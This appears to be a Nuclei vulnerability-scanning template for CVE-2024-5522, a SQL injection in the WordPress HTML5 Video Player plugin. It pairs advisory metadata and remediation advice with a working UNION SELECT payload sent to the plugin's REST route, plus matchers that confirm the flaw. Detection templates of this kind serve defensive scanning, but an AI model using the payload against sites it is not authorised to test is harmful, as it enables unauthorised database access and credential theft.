id: CVE-2024-5522

info:
  name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
  author: JohnDoeAnonITA
  severity: critical
  description: |
    The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries to extract sensitive database information including user credentials, configuration data, and potentially execute commands on the database server.
  remediation: |
    Update HTML5 Video Player plugin to version 2.5.27 or later to address the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5522
  classification:
    cvss-score: 9.8
    cwe-id: CWE-89
    cve-id: CVE-2024-5522
    epss-score: 0.83843
    epss-percentile: 0.99311
    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/html5-video-player"
    product: html5_video_player
    vendor: bplugins
  tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220694e7b5a6a9a5dfc6d36f67050b9b454f397f49a3f6a700c897a54ca910277ea022100986c40b86543b635f454202a2f92cb40567233433bbe7b372a80a89aa1d5f5f8:922c64590222798bb761d5b6d8e72950